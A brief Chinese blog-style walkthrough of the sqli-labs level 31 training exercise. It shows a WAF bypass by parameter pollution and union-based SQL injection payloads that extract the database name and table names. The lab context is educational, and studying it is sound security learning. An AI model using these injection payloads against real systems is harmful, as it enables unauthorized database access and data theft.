0x01找闭合 这里是WAF的jsp调到php的同样

第二个参数构造 偷看源码 闭合是")

sqli-labs(31)

我们尝试一下构造爆破数据库名

login.php?id=1&id=-1") union select 1,database(),3%23

sqli-labs(31)

爆破表名

?id=1&id=-1") union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

sqli-labs(31)

0X03组合拳继续打

 

 

切记 学习之路  少就是多 慢就是快

 

相关文章:

  • 2022-01-20
  • 2021-08-23
  • 2022-01-02
  • 2021-09-27
  • 2021-09-30
  • 2021-10-22
  • 2021-08-22
  • 2021-05-24
猜你喜欢
  • 2021-11-13
  • 2021-08-07
  • 2020-04-21
  • 2021-10-10
  • 2021-09-07
  • 2022-02-17
  • 2021-05-07
相关资源
相似解决方案